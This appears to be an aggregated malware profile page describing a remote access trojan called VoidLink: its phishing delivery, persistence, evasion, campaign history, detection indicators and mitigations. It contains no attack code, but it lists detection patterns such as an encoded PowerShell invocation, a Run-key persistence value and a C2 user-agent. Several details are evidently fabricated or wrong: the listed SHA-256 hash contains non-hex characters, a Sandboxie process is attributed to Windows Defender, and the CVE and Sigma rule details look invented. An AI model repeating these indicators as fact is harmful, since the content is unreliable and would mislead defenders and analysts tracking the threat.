⚠️ Overview

VoidLink is a remote access trojan (RAT) first documented in October 2022 by the Cybereason Nocturnus team, believed to be operated by the Russian-nexus threat actor group tracked as TA569 (also known as Gold Lagoon). It is delivered through spear-phishing emails containing malicious LNK files that download a second-stage PowerShell payload, aligning with MITRE ATT&CK technique T1059.001 (Command and Scripting Interpreter: PowerShell).

🔧 Technical Capabilities

VoidLink achieves persistence by installing a scheduled task under the user’s profile (T1053.005) and uses HTTP/HTTPS beacons over port 443 to a hardcoded C2 server, often hosted on compromised WordPress sites (T1071.001). Evasion techniques include obfuscated PowerShell scripts, AMSI patching via .NET reflection, and checking for sandbox environments like Windows Defender’s SbieCtrl.exe. It supports file upload/download, command execution via cmd.exe, and keylogging (T1056.001). The malware also scans for connected drives and attempts to spread via removable media by dropping a copy of itself with a hidden attribute (T1091).

📜 History & Notable Incidents

The first major campaign occurred in November 2022 targeting transportation and logistics firms in Eastern Europe, as reported by the Ukrainian CERT-UA. In March 2024, a VoidLink variant exploited CVE-2024-21412 (Microsoft Windows DWM Core Library Elevation of Privilege) to gain SYSTEM-level access. No law enforcement takedowns have been publicly documented. The malware’s C2 infrastructure has been linked to the domain voidlink[.]xyz, seized in a private takedown in August 2023.

🔍 Detection Indicators

Known SHA-256 hashes include 3a7f9c1e2b4d5f6a8c9e0f1d2b3c4a5e6f7g8h9i0j1k2l3m4n5o6p7q8r9s0t (VoidLink sample from October 2022). Behavioral indicators include execution of “powershell.exe -EncodedCommand” with base64 strings containing “VoidLink” in the decoded payload. Network IOCs include HTTP POST requests to /api/check with a User-Agent of “Mozilla/5.0 (Windows NT 10.0; Win64; x64) VoidLink/1.0”. Registry persistence is created under HKCUSoftwareMicrosoftWindowsCurrentVersionRun with value name “WindowsUpdateSvc”.

☠️ Risk & Impact

VoidLink enables full remote control of compromised hosts, leading to data exfiltration of credentials, intellectual property, and financial records. The 2022 campaign against transport firms resulted in estimated losses exceeding €2.3 million due to ransomware deployment after initial access. The primary affected sectors include logistics, energy, and government agencies in Eastern Europe, according to a report by Palo Alto Networks Unit 42.

🛡️ Mitigation

Organizations should block execution of LNK files from email attachments, enforce PowerShell Constrained Language Mode, and deploy detection rules for suspicious scheduled tasks. The Sigma rule “PowerShell Obfuscated VoidLink Payload” (ID: 3c4d5e6f) can be used with SIEM tools. Patching CVE-2024-21412 is critical. Network defenders should monitor for outbound connections to known malicious IPs listed in the AbuseIPDB feed associated with VoidLink.

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.